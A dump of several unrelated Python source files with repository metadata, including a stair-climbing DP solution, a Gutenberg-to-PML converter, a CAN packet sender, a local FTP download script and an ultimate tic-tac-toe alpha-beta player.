# import sys
# def usage(exit_status):
# msg = '\n ... \n'
#
# print(msg)
# sys.exit(exit_status)
#
# import getopt
#
# # parse command line options/arguments
# try:
# opts, args = getopt.getopt(sys.argv[1:],
# 'hd:', ['help', 'dir='])
# except getopt.GetoptError:
# usage(3)
#
# for opt, arg in opts:
# if opt in ('-h', '--help'):
# usage(0)
# if opt in ('-d', '--dir'):
# thedir = arg
pass
|
[
"github@frenetic.be"
] |
github@frenetic.be
|
208520ec6faf7a20465bcdae97a776059c2a8942
|
e811662c890217c77b60aa2e1295dd0f5b2d4591
|
/src/problem_70.py
|
9f79c1c9227baf7b401269ea318c8b52448b42a3
|
[] |
no_license
|
rewonderful/MLC
|
95357f892f8cf76453178875bac99316c7583f84
|
7012572eb192c29327ede821c271ca082316ff2b
|
refs/heads/master
| 2022-05-08T05:24:06.929245
| 2019-09-24T10:35:22
| 2019-09-24T10:35:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,357
|
py
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
def climbStairs(self, n):
"""
算法:动态规划
思路:
爬楼梯的方式只有一次上1步或者一次上2步,所以第i个位置的状态state(i)只与state(i-1),
和state(i-2)有关,例如state(5),第5个台阶不是从第3个台阶来的就是从第4个台阶来的。所以
可以构造状态转移方程state(i) = state(i-1) + state(i-2)。这便是最优子结构,即当前解
依赖于更小规模的解。并且画出来图后可以看到,第4个台阶不是从第3个来的就是从第2个来的,所以存在
重叠子问题,将问题自底向上,解决了小问题后构筑大问题。
程序的出口就是台阶数是1或者2的话就return n
注意:
动规构建问题的时候不一定要像01背包一样有二维表来记录一些值,可能只是一维数组就够了,即记录
更小问题的结果,并且在更小问题的基础上构建更大问题的题解
复杂度分析:
时间:ON,遍历一遍
空间:ON,steps数组的空间
"""
if n == 1 or n == 2:
return n
steps = [0] * (n + 1)
steps[1] = 1
steps[2] = 2
for i in range(3, n + 1):
steps[i] = steps[i - 1] + steps[i - 2]
return steps[-1]
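# A minimal sanity check of the recurrence (assumes the method is pasted onto a
# LeetCode-style Solution class, which is how such snippets are normally used;
# the _Solution scaffolding below is added only for this check):
class _Solution:
    climbStairs = climbStairs

# for n = 5 the steps array fills as [0, 1, 2, 3, 5, 8]
assert _Solution().climbStairs(5) == 8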
|
[
"457261336@qq.com"
] |
457261336@qq.com
|
22a2116ccdefdc98a9450d2d810f260f5099439d
|
016a5f87f4b29640756495ae3e9ae123ab27465b
|
/siraj/myclassifier.py
|
0b965912519cfba6cb5833d57d6589d99fe976a9
|
[] |
no_license
|
fazejohk/ImPy
|
8bc6e4b9ab824763cd77e59c6ae7968ec077f178
|
c3d6be535b629226c525a2553736ea2a6ff69487
|
refs/heads/master
| 2021-04-30T13:02:16.873382
| 2018-03-20T15:13:13
| 2018-03-20T15:13:13
| 121,287,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,889
|
py
|
import wikipedia
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import tree
x = 0
y = 0
words = []
whatisit = []
vectorizer = CountVectorizer()
decision = tree.DecisionTreeClassifier()
# So this is what is happening:
# I'm opening a word list called SkullSecurityComp
# and searching Wikipedia for each term in the word list;
# if a summary is found it counts as True, otherwise as False
with open("/home/me/Downloads/SkullSecurityComp") as f:
for line in f:
try:
if wikipedia.summary(line, sentences=1):
print "True"
                length = len(line) - 2  # strip the trailing line ending from the entry
                words.append(line[0:length])
whatisit.append("Good")
x += 1
except KeyboardInterrupt:
count = x + y
print "\nTrue:" + str(x)
print "False:" + str(y)
print "Scanned:" + str(count)
""""
print "Words:" + str(words)
print "What is it:" + str(whatisit)
"""
vectorizer.fit(words)
vector = vectorizer.transform(words)
"""
print "Shape"
print vector.shape
print "Type"
print type(vector)
print "Toarray"
print vector.toarray()
"""
decision.fit(vector.toarray(), whatisit)
userinput = ""
while userinput != 'q':
userinput = raw_input("Search:\n")
text = [str(userinput)]
vector2 = vectorizer.transform(text)
prediction = decision.predict(vector2.toarray())
print prediction
exit(0)
except:
print "False"
            length = len(line) - 2
            words.append(line[0:length])
whatisit.append("Bad")
y += 1
|
[
"johkmr@gmail.com"
] |
johkmr@gmail.com
|
a0244f7a50d5afebf201e351a8c8342132e79e9b
|
fa6f374fcdb892e35c8041db136f5c16abf2043a
|
/tomswift2pml.py
|
00a7fbd4002ebed3da78a97231e770c3da5b875d
|
[] |
no_license
|
mgatto/tomswift2pml.py
|
0943b0f27fa9b8f072304bab093201d1cf111a0a
|
f84e1678bd244a807c23540ffb3aad0b95687fa0
|
refs/heads/master
| 2022-11-05T02:07:33.004792
| 2020-06-15T00:22:05
| 2020-06-15T00:22:05
| 272,305,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,576
|
py
|
import linecache
"""
replace -- with \a150\a150
"""
# lifted from a stackoverflow snippet and modified by me.
def int_to_roman(input):
""" Convert an integer to a Roman numeral. """
if not isinstance(input, type(1)):
raise TypeError(f"expected integer, got {type(input)}")
if not 0 < input < 4000:
raise ValueError("Argument must be between 1 and 3999")
ints = (1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1)
nums = ('M', 'CM', 'D', 'CD','C', 'XC','L','XL','X','IX','V','IV','I')
result = []
for i in range(len(ints)):
count = int(input / ints[i])
result.append(nums[i] * count)
input -= ints[i] * count
return ''.join(result)
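# Quick sanity checks of the conversion above (added for illustration; safe to
# run at import time):
assert int_to_roman(14) == 'XIV'
assert int_to_roman(1987) == 'MCMLXXXVII'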
def gutenberg2pml(in_file, out_file):
    # honour the caller-supplied out_file; the original hardcoded
    # "Tom_Swift_and_His_Airship.pml" here, which overrode the parameter
    ow = open(out_file, "w")
book_title = linecache.getline(in_file, 1).split("Title: ")[1].rstrip('\n')
year = linecache.getline(in_file, 2).split("Copyright: ")[1].rstrip('\n')
print(f"""\\v
TITLE="{book_title}"
AUTHOR="Victor Appleton"
PUBLISHER="Grosset & Dunlap"
COPYRIGHT="{year}"
EISBN=""
\\v
\\m="cover.png"
\p
\\c\\l\\B{book_title}\\B\\l
\\sBy Victor Appleton\s
\\c
\\w="100%"
\\c\\s\\i {year} \\i\\s
\\c\\n""", file=ow)
with open(in_file, 'r') as fp:
        # metadata lines ("Title:", "Copyright:") are skipped via the startswith checks below
paragraph = []
for line_no, line in enumerate(fp, start=1):
# print(line_no, line)
"""
can skip with this, too:
----
from itertools import islice
lines = list("abcdefghij")
lit = iter(enumerate(lines))
for iline, line in lit:
print(iline, line)
if line == "c":
# skip 3
next(islice(lit, 3,3), None)
"""
if line.startswith("Title:") or line.startswith("Copyright:"):
continue
if line.startswith("Chapter"):
# format the chapter title
chapter_number = line.split("Chapter ")[1].rstrip("\n")
# title is 2 lines ahead of this one
chapter_title = linecache.getline(in_file, line_no + 2).rstrip("\n")
# print(f"chapter line no={line_no} & chapter name={line_no + 2}: {chapter_title}")
print(f"""\\x
\\c\\B\\l Chapter {int_to_roman(int(chapter_number))}: \\l\\B
\\l\\u{chapter_title}\\l\\u
\\c
\\x\\n""", file=ow)
else:
if not line.isspace() and line.rstrip('\n') != chapter_title:
paragraph.append(line.rstrip('\n'))
"""
# this causes the last paragraph to never print because there is no blank line after it...
the source file must be terminated with two blank lines, i.e. a full line whose only content is "\n"
"""
if line.isspace():
# a blank line delimits paragraphs
joined_paragraph = f"{' '.join(paragraph)}\n"
if not joined_paragraph.isspace():
print(joined_paragraph, file=ow)
# TODO make a paragraph counter?
paragraph.clear()
fp.close()
print("""
\w="30%"
\c\BTHE END\B
\c
""", file=ow)
ow.close()
if "__name__" == "__main__":
in_file = input("Enter text file name")
# TODO check for txt?
out_file = f"{in_file.split('.')[0]}.pml"
gutenberg2pml(in_file, out_file)
|
[
"mgatto@vinsuite.com"
] |
mgatto@vinsuite.com
|
d18b5dee90a502b1f960247c1c55f66caee5a74c
|
b9433e893746e35f31e61a349b4f07e51aca822f
|
/ftp/down.py
|
874de8cc6564d14ddfe98f08785fb404fb9b1b71
|
[] |
no_license
|
adadeeeh/progjar
|
71a689bb510c1bdedf357d2ddd77d58c67a017f5
|
d6f85bf22d2acfae0867a61052eca28cbafa2ad1
|
refs/heads/master
| 2021-07-15T08:15:37.588593
| 2017-10-23T07:19:39
| 2017-10-23T07:19:39
| 105,483,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from ftplib import FTP
f = FTP('127.0.0.1')
f.login('Hana', 'tes')
fd = open('grafkom.pdf', 'wb')
f.retrbinary('RETR grafkom.pdf', fd.write)
fd.close()
f.quit()
|
[
"faturrahmanmakruf@gmail.com"
] |
faturrahmanmakruf@gmail.com
|
ff577b243a30e6d8ed9bf166b5dc4666b2766396
|
f6cba93e1fd4907ab0ac2dbabfebc174db1d199f
|
/final_project/game_class.py
|
f8d78f7ab7095dca239c1eeecc3be6b33c1fd0aa
|
[] |
no_license
|
muqizou/242_final_lol
|
a3a0e01f9c064ef34a9421a6b3bcbf7474a15f96
|
25a58e301e3dbb2a0d29c487f00dbdcf6f887ce2
|
refs/heads/master
| 2021-01-10T06:53:59.422713
| 2016-02-19T05:39:34
| 2016-02-19T05:39:34
| 52,055,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
import roles
from roles import roles
class game_class:
def __init__(self,blueside,purpleside,win):
self.blueside=blueside
self.purpleside=purpleside
self.win=win
def tell_result(self):
return self.win
def find_num(self,nums):
for i in range(0,5):
if nums[0] == self.blueside.herocode[i]:
for j in range(0,5):
if nums[1] == self.purpleside.herocode[j]:
if self.win == "blue":
return "win"
else:
return "lose"
else:
pass
else:
pass
for i in range(0,5):
if nums[1] == self.blueside.herocode[i]:
for j in range(0,5):
if nums[0] == self.purpleside.herocode[j]:
return "purple"
else:
pass
else:
pass
return "NA"
def print_info(self):
self.blueside.print_info()
self.purpleside.print_info()
print self.win
|
[
"muqizou2@illinois.edu"
] |
muqizou2@illinois.edu
|
80ef6c1589b3dc81546f05c175f25444c4f3844d
|
26d04fb000bdd882120109c5aec82c26fb1d9cdb
|
/interface/canibal/CANibal.py
|
5bf3642d4240954a53ae2e615c8ed896a971d020
|
[] |
no_license
|
blomqvist/thesis
|
445ae2dafebd2c2361ec28f9a9c1e55b1f20a4d7
|
532d0e47a18c05cf643a5898c6f92020d2f7e6d0
|
refs/heads/master
| 2020-05-17T04:22:37.097397
| 2016-01-28T18:21:40
| 2016-01-28T18:21:40
| 30,926,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
import subprocess
import os
class CANibal:
count = 0
FNULL = open(os.devnull, 'w')
''' ICH DEFINES '''
ICH_NODE_ID = 0x17
ICH_PDO_MISO1 = (0x200 + ICH_NODE_ID)
''' ACT DEFINES '''
ACT_NODE_ID = 0x0B
ACT_PDO_MOSI1 = (0x200 + ACT_NODE_ID)
ACT_PDO_MISO1 = (0x180 + ACT_NODE_ID)
ACT_PDO_MISO2 = (0x280 + ACT_NODE_ID)
ACT_PDO_MISO3 = (0x380 + ACT_NODE_ID)
''' EPS DEFINES '''
EPS_NODE_ID = 0x07
EPS_PDO_MOSI1 = (0x200 + EPS_NODE_ID)
''' OCU DEFINES '''
OCU_NODE_ID = 0x1B
OCU_PDOrx1 = (0x200 + OCU_NODE_ID) # Data from MCU: Bfly, AdLift, Buttons
OCU_PDOtx1 = (0x180 + OCU_NODE_ID) # Data from OCU: Command, Speed, Steer, etc
OCU_PDOtx2 = (0x280 + OCU_NODE_ID) # Data from OCU: Display text + LED
''' DEBUG DEFINES '''
DBG_PDO_1 = 0x665
data = [0, 0, 0, 0, 0, 0, 0, 0]
def send_packet(self, COBID):
data = list(map(str, self.data)) # Convert int -> str
subprocess.call(
['./cdump',
str(COBID),
data[0],
data[1],
data[2],
data[3],
data[4],
data[5],
data[6],
data[7]],
stdout = self.FNULL)
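# A minimal usage sketch (assumes the cdump binary sits in the working
# directory, as send_packet expects; the payload values are illustrative):
#
#   bus = CANibal()
#   bus.data = [1, 0, 0, 0, 0, 0, 0, 0]
#   bus.send_packet(CANibal.DBG_PDO_1)  # emits COB-ID 0x665 with the payload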
|
[
"niklas.blomqvist@gmail.com"
] |
niklas.blomqvist@gmail.com
|
5b79656e0e0548dcf89cf0e97aeba438f35d2ddc
|
916f8962b18272b62fdccd5b2d9ec4b2b2d4d533
|
/prelim/nuisance_matrix.py
|
c2c48eb0b9d1865b09a5941cfa329243871012da
|
[] |
no_license
|
fahaxiki1234/ThalamoCortical_YBK
|
284b84f67fdcc525e3b0c65cc13f0068463fce5d
|
63fee7dea60ba94d04ef9f55cd2b220bb63836a6
|
refs/heads/master
| 2023-03-16T04:22:02.865421
| 2020-05-22T04:21:46
| 2020-05-22T04:21:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
#!/usr/bin/python
import os
import numpy as np
for subject in os.listdir(os.getcwd()):
if subject.startswith(('C','F','N')):
matrices = 'CSF_noise.txt', 'WM_noise.txt', 'mn.txt'
for matrix in matrices:
if matrix.startswith(('C', 'W')):
nuisance_path = '{subject}/nuisance'.format(subject=subject)
                pre = np.loadtxt('{subject}/nuisance/{matrix}'.format(subject=subject, matrix=matrix))
                demean = pre - pre.mean(axis=0)  # demean each column separately, per the original TODO
                np.savetxt(os.path.join(nuisance_path, 'demeaned_{matrix}').format(matrix=matrix), demean)
nuisance_contrast = np.asmatrix('1 0')
np.savetxt(os.path.join(nuisance_path, 'contrast.txt'), nuisance_contrast)
if matrix.startswith('m'):
mn_path = '{subject}/motion'.format(subject=subject)
mn = np.loadtxt('{subject}/motion/{matrix}'.format(subject=subject, matrix=matrix))
                mn_delete = np.delete(mn, (114,115), 0) ## need (112,113,114,115) if deleting initial 4 volumes
mn_demean = mn_delete - mn_delete.mean()
np.savetxt(os.path.join(mn_path, 'demeaned_{matrix}').format(matrix=matrix), mn_demean)
mn_contrast = np.asmatrix('1')
np.savetxt(os.path.join(mn_path, 'contrast.txt'), mn_contrast)
|
[
"noreply@github.com"
] |
fahaxiki1234.noreply@github.com
|
e58b04d39ba07e1e3dc874d35c7451fae4675d0d
|
de11f3f8b11e48c17aaf8fc8e73a9514683ee783
|
/main.py
|
4d8847a5d7a4fee0a8206bdf85999b3da1de4559
|
[] |
no_license
|
Yz4230/watch_uec
|
c57ab6cd87eabbe2f0b714143ef80303cf3ad131
|
e6a905d68e8c963a5a8bc8e5c1b44406b1c3560d
|
refs/heads/master
| 2023-04-16T19:50:44.707347
| 2021-04-28T02:27:34
| 2021-04-28T02:27:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,525
|
py
|
import re
import json
import os
import requests
import discord
from typing import Optional
from pprint import pprint
from difflib import unified_diff
from datetime import datetime
from bs4 import BeautifulSoup
from dotenv import load_dotenv
load_dotenv('.env')
DISCORD_WEBHOOK_URL = os.environ.get('DISCORD_WEBHOOK_URL')
HISTORY_JSON_PATH = './history.json'
WATCH_TARGET_URL = 'https://www.uec.ac.jp/students/urgent_info/index.html'
DISCORD_MESSAGE_URL = '''\
ページが更新されました。更新内容は次の通りです。
```diff
{diff}
```
ページのURLはこちらです。\
'''
def get_iso_time() -> str:
return datetime.now().astimezone().isoformat()
def load_history() -> Optional[dict]:
try:
with open(HISTORY_JSON_PATH) as rf:
return json.load(rf)
except FileNotFoundError:
return None
def save_history(history_content: str) -> None:
with open(HISTORY_JSON_PATH, mode='w') as wf:
json.dump({
'content': history_content,
'savedAt': get_iso_time()
}, wf, ensure_ascii=False, indent=2)
def fetch_current_website_content() -> str:
res = requests.get(WATCH_TARGET_URL)
soup = BeautifulSoup(res.text, 'html.parser')
text = soup.select_one('#primary').text
text = re.sub(r'\n+', '\n', text)
text = '\n'.join(map(lambda s: s.strip(), text.split()))
return text
def compute_unified_diff(a: str, b: str) -> str:
diff = unified_diff(a.split('\n'), b.split('\n'), n=2)
return '\n'.join(diff)
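# For illustration: compute_unified_diff('a\nb', 'a\nc') yields a hunk whose
# body lines are ' a', '-b', '+c' (the '---'/'+++' header lines come from
# difflib defaults); that text is what lands inside the fenced diff block of
# the Discord message.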
def post_discord_message(message_content: str) -> None:
requests.post(DISCORD_WEBHOOK_URL, json={
'content': message_content,
'embeds': [{
'title': '新型コロナウイルスに係る在学生へのお知らせ│電気通信大学',
'url': 'https://www.uec.ac.jp/students/urgent_info/index.html',
'image': {
'url': 'https://www.uec.ac.jp/images_new/mv/mv_corona_sp.jpg'
}
}]
})
current_website_content = fetch_current_website_content()
last_website_content = history['content'] if (
history := load_history()) else None
if last_website_content is None:
save_history(current_website_content)
elif current_website_content != last_website_content:
save_history(current_website_content)
diff = compute_unified_diff(last_website_content, current_website_content)
discord_message_content = DISCORD_MESSAGE_URL.format(diff=diff)
post_discord_message(discord_message_content)
|
[
"yuzupon1480@gmail.com"
] |
yuzupon1480@gmail.com
|
a4ddc00e2cfe0b4082f7f3aa943524d7b959c566
|
55fea66b55b669838b933b5182f819067bc85e0c
|
/src/LoginController.py
|
39e6c97a4e5032bebfb66d3bafe483e23b025ffc
|
[] |
no_license
|
jalacardio/LolAnaly
|
334f6bf008d43411658baf3e7bfe9a62700d581b
|
09da0520b6d55aa079bb8d836386c82a20dc2f78
|
refs/heads/master
| 2021-09-02T08:57:14.564969
| 2018-01-01T08:17:19
| 2018-01-01T08:17:19
| 115,587,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
class LoginController:
def __init__(self):
print("Login controller created")
def login(self, app):
usr = app.getEntry("UserID")
print("User: ", usr)
|
[
"noreply@github.com"
] |
jalacardio.noreply@github.com
|
673017b4758bc4dcd16835c0e1a246dda28b7ba3
|
906c2d43c010b0435c8254246e92505ae350af93
|
/AI/team29.py
|
3582e2f0ec0e112bb7e20f04609030a44879b15e
|
[] |
no_license
|
surendra1233/sem-4
|
5ba25225179767c102f219cdb8bc8b63ca150214
|
3f9fe0d0761fcb3ca847d36fd61fad3f9e4a6795
|
refs/heads/master
| 2022-07-20T01:44:41.526805
| 2019-06-17T15:21:23
| 2019-06-17T15:21:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,730
|
py
|
# from simulator import copy
import copy,time
class Team29:
def __init__(self):
self.blocks = {}
self.player = "x"
self.opponent = "o"
self.count = 0
self.start = time.time()
def find_valid_move_cells(self, old_move,small_boards_status,big_boards_status):
#returns the valid cells allowed given the last move and the current board state
allowed_cells = []
allowed_small_board = [old_move[1]%3, old_move[2]%3]
#checks if the move is a free move or not based on the rules
if old_move == (-1,-1,-1) or (small_boards_status[0][allowed_small_board[0]][allowed_small_board[1]] != '-' and small_boards_status[1][allowed_small_board[0]][allowed_small_board[1]] != '-'):
for k in range(2):
for i in range(9):
for j in range(9):
if big_boards_status[k][i][j] == '-' and small_boards_status[k][i/3][j/3] == '-':
allowed_cells.append((k,i,j))
else:
for k in range(2):
if small_boards_status[k][allowed_small_board[0]][allowed_small_board[1]] == "-":
for i in range(3*allowed_small_board[0], 3*allowed_small_board[0]+3):
for j in range(3*allowed_small_board[1], 3*allowed_small_board[1]+3):
if big_boards_status[k][i][j] == '-':
allowed_cells.append((k,i,j))
return allowed_cells
def check_valid_move(self, old_move, new_move,small_boards_status,big_boards_status):
#checks if a move is valid or not given the last move
if (len(old_move) != 3) or (len(new_move) != 3):
return False
for i in range(3):
if (type(old_move[i]) is not int) or (type(new_move[i]) is not int):
return False
if (old_move != (-1,-1,-1)) and (old_move[0] < 0 or old_move[0] > 1 or old_move[1] < 0 or old_move[1] > 8 or old_move[2] < 0 or old_move[2] > 8):
return False
cells = self.find_valid_move_cells(old_move,small_boards_status,big_boards_status)
return new_move in cells
def update(self, old_move, new_move, ply,small_boards_status,big_boards_status):
#updating the game board and small_board status as per the move that has been passed in the arguements
if(self.check_valid_move(old_move, new_move,small_boards_status,big_boards_status)) == False:
return 'UNSUCCESSFUL', False
big_boards_status[new_move[0]][new_move[1]][new_move[2]] = ply
x = new_move[1]/3
y = new_move[2]/3
k = new_move[0]
#checking if a small_board has been won or drawn or not after the current move
bs = big_boards_status[k]
for i in range(3):
#checking for horizontal pattern(i'th row)
if (bs[3*x+i][3*y] == bs[3*x+i][3*y+1] == bs[3*x+i][3*y+2]) and (bs[3*x+i][3*y] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking for vertical pattern(i'th column)
if (bs[3*x][3*y+i] == bs[3*x+1][3*y+i] == bs[3*x+2][3*y+i]) and (bs[3*x][3*y+i] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking for diagonal patterns
#diagonal 1
if (bs[3*x][3*y] == bs[3*x+1][3*y+1] == bs[3*x+2][3*y+2]) and (bs[3*x][3*y] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#diagonal 2
if (bs[3*x][3*y+2] == bs[3*x+1][3*y+1] == bs[3*x+2][3*y]) and (bs[3*x][3*y+2] == ply):
small_boards_status[k][x][y] = ply
return 'SUCCESSFUL', True
#checking if a small_board has any more cells left or has it been drawn
for i in range(3):
for j in range(3):
if bs[3*x+i][3*y+j] =='-':
return 'SUCCESSFUL', False
small_boards_status[k][x][y] = 'd'
return 'SUCCESSFUL', False
def block_status(self,block):
for i in range(3):
if block[i][0]==block[i][1]==block[i][2] and block[i][1] != "-":
return block[i][0]
if block[0][i] == block[1][i] == block[2][i] and block[1][i] != "-":
return block[0][i]
if block[0][0]==block[1][1]==block[2][2] and block[0][0] !="-":
return block[0][0]
if block[0][2]==block[1][1]==block[2][0] and block[1][1] !="-":
return block[1][1]
for i in range(3):
for j in range(3):
if block[i][j]=='-':
return "-"
return "d"
def find_terminal_state(self,small_boards_status):
        #checks if the game is over (won or drawn) and returns the player who has won the game, or the player who holds more small_boards in case of a draw
cntx = 0
cnto = 0
cntd = 0
for k in range(2):
bs = small_boards_status[k]
for i in range(3):
for j in range(3):
if bs[i][j] == 'x':
cntx += 1
if bs[i][j] == 'o':
cnto += 1
if bs[i][j] == 'd':
cntd += 1
for i in range(3):
row = bs[i]
col = [x[i] for x in bs]
#print row,col
#checking if i'th row or i'th column has been won or not
if (row[0] =='x' or row[0] == 'o') and (row.count(row[0]) == 3):
return (row[0],'WON')
if (col[0] =='x' or col[0] == 'o') and (col.count(col[0]) == 3):
return (col[0],'WON')
#check diagonals
if(bs[0][0] == bs[1][1] == bs[2][2]) and (bs[0][0] == 'x' or bs[0][0] == 'o'):
return (bs[0][0],'WON')
if(bs[0][2] == bs[1][1] == bs[2][0]) and (bs[0][2] == 'x' or bs[0][2] == 'o'):
return (bs[0][2],'WON')
if cntx+cnto+cntd < 18: #if all small_boards have not yet been won, continue
return ('CONTINUE', '-')
elif cntx+cnto+cntd == 18: #if game is drawn
return ('NONE', 'DRAW')
def checkAllowedMoves(self,block):
allowed=[]
for i in range(3):
for j in range(3):
if block[i][j] == "-":
allowed.append((i, j))
return allowed
def block_score(self,block):
block = tuple([tuple(block[i]) for i in range(3)])
moves = []
if block not in self.blocks:
stat = self.block_status(block)
if stat == self.player:
self.blocks[block] = 1
elif stat == self.opponent:
self.blocks[block] = 0
elif stat == "d":
self.blocks[block] = 0.2
else:
moves = self.checkAllowedMoves(block)
#we play the next move
our_scores = []
playBlock = [list(block[i]) for i in range(3)]
for move in moves:
playBlock[move[0]][move[1]] = self.player
our_scores.append(self.block_score(playBlock))
playBlock[move[0]][move[1]] = "-"
#opponent plays the next move
op_scores = []
for move in moves:
playBlock[move[0]][move[1]] = self.opponent
op_scores.append(self.block_score(playBlock))
playBlock[move[0]][move[1]] = "-"
self.blocks[block] = 0.5*(max(our_scores)+min(op_scores))
return self.blocks[block]
def board_score(self,small_boards_status,big_boards_status,flag):
scores = [[],[]]
op_scores = [[],[]]
cntx = 0
cnto = 0
cntd = 0
for k in range(2):
bs = small_boards_status[k]
for i in range(3):
for j in range(3):
if bs[i][j] == 'x':
cntx += 1
if bs[i][j] == 'o':
cnto += 1
if bs[i][j] == 'd':
cntd += 1
if cntx+cnto+cntd == 18: #if game is drawn
return 50
for k in range(2):
for i in range(3):
for j in range(3):
temp = [[big_boards_status[k][i*3+r][j*3+c] for r in range(3)]for c in range(3)]
#score for each block
scores[k].append(self.block_score(temp))
for k in range(2):
for i in range(3):
for j in range(3):
temp = [[0 for r in range(3)]for c in range(3)]
for r in range(3):
for c in range(3):
if big_boards_status[k][i*3+r][j*3+c]==self.player:
temp[r][c] = self.opponent
elif big_boards_status[k][i*3+r][j*3+c]==self.opponent:
temp[r][c] = self.player
else:
temp[r][c] = "-"
op_scores[k].append(self.block_score(temp))
#get line scores
lines = [[],[]]
op_lines = [[],[]]
for k in range(2):
for i in range(3):
lines[k].append(scores[k][3*i]*scores[k][3*i+1]*scores[k][3*i+2])
op_lines[k].append(op_scores[k][3*i]*op_scores[k][3*i+1]*op_scores[k][3*i+2])
lines[k].append(scores[k][i]*scores[k][i+3]*scores[k][i+6])
op_lines[k].append(op_scores[k][i]*op_scores[k][i+3]*op_scores[k][i+6])
lines[k].append(scores[k][0]*scores[k][4]*scores[k][8])
op_lines[k].append(op_scores[k][0]*op_scores[k][4]*op_scores[k][8])
lines[k].append(scores[k][2]*scores[k][4]*scores[k][6])
op_lines[k].append(op_scores[k][2]*op_scores[k][4]*op_scores[k][6])
#return sum of the scores of lines
if 1 in lines[0]:
return 100
elif 1 in lines[1]:
return 100
elif 1 in op_lines[0]:
return -100
elif 1 in op_lines[1]:
return -100
else:
# if flag==self.player:
return max(sum(lines[0])-sum(op_lines[0]),sum(lines[1])-sum(op_lines[1]))
# else:
# return min(sum(lines[0])-sum(op_lines[0]),sum(lines[1])-sum(op_lines[1]))
def move(self, board, old_move, flag):
self.start = time.time()
if self.count==0 and flag != self.player:
self.opponent = "x"
self.player = "o"
depth = 4
elif self.count==0:
depth = 4
elif self.count<=30:
depth = 4
elif self.count<=60:
depth = 4
elif self.count<=70:
depth = 4
else:
depth = 5
# else:
# depth = 4
if self.count==0 and flag=="x":
self.count+=1
t = [["-","-","-"],["-","-","-"],["-","-","-"]]
a = self.block_score(t)
return (0,4,4)
big_boards_status = copy.deepcopy(board.big_boards_status)
small_boards_status = copy.deepcopy(board.small_boards_status)
if big_boards_status[old_move[0]][old_move[1]][old_move[2]] == self.player:
score,next_move= self.alphabetapruning(small_boards_status,big_boards_status,depth,old_move, -100000000, 100000000,flag,True)
else:
score,next_move= self.alphabetapruning(small_boards_status,big_boards_status,depth,old_move, -100000000, 100000000,flag,False)
self.count+=1
# print next_move,score, flag, depth
return next_move
def alphabetapruning(self,small_boards_status,big_boards_status,depth,old_move,alpha,beta,flag,bonus):
stat = self.find_terminal_state(small_boards_status)
if stat[0] == self.player:
return 100,()
elif stat[0] == self.opponent:
return -100,()
elif stat[1] == "DRAW":
return 50,()
max_player = False
if flag==self.player:
max_player = True
# temp = BigBoard()
temp_big_boards_status = copy.deepcopy(big_boards_status)
temp_small_boards_status = copy.deepcopy(small_boards_status)
moves = self.find_valid_move_cells(old_move,small_boards_status,big_boards_status)
# random.shuffle(moves)
move_scores = []
siz = len(moves)
if siz > 18 and self.count<=60:
depth -= 1
i = 0
if depth > 0 and time.time()-self.start<=22:
for m in moves:
self.update(old_move,m,flag,temp_small_boards_status,temp_big_boards_status)
move_scores.append((self.board_score(temp_small_boards_status,temp_big_boards_status,flag),i))
temp_big_boards_status[m[0]][m[1]][m[2]] = "-"
temp_small_boards_status[m[0]][m[1]/3][m[2]/3] = "-"
i+=1
        #sort them in decreasing order, in place (the original called sorted() and discarded the result)
        move_scores.sort(key=lambda x: x[0], reverse=max_player)
bestmove = ()
# print moves
if depth>1 and time.time()-self.start<=22:
for i in range(siz):
self.update(old_move,moves[move_scores[i][1]],flag,temp_small_boards_status,temp_big_boards_status)
if max_player:
if temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] == self.player and bonus == False:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.player,True)
# if s < beta:
# beta = s
# bestmove = moves[move_scores[i][1]]
# if alpha >= beta:
# break
else:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.opponent,False)
if s > alpha:
alpha = s
bestmove = moves[move_scores[i][1]]
if alpha >= beta:
break
if time.time()-self.start>22:
return move_scores[0][0],moves[move_scores[0][1]]
else:
if temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] == self.opponent and bonus == False:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.opponent,True)
# if s > alpha:
# alpha = s
# bestmove = moves[move_scores[i][1]]
# if alpha >= beta:
# break
else:
s,m = self.alphabetapruning(temp_small_boards_status,temp_big_boards_status,depth-1,moves[move_scores[i][1]],alpha,beta,self.player,False)
if s < beta:
beta = s
bestmove = moves[move_scores[i][1]]
if alpha >= beta:
break
if time.time()-self.start>22:
return move_scores[0][0],moves[move_scores[0][1]]
temp_small_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]/3][moves[move_scores[i][1]][2]/3] = "-"
temp_big_boards_status[moves[move_scores[i][1]][0]][moves[move_scores[i][1]][1]][moves[move_scores[i][1]][2]] = "-"
elif depth > 0 and time.time()-self.start<=22:
return move_scores[0][0],moves[move_scores[0][1]]
else:
return self.board_score(small_boards_status,big_boards_status,flag),bestmove
# if depth==5:
# print move_scores
if max_player:
return alpha,bestmove
else:
return beta,bestmove
|
[
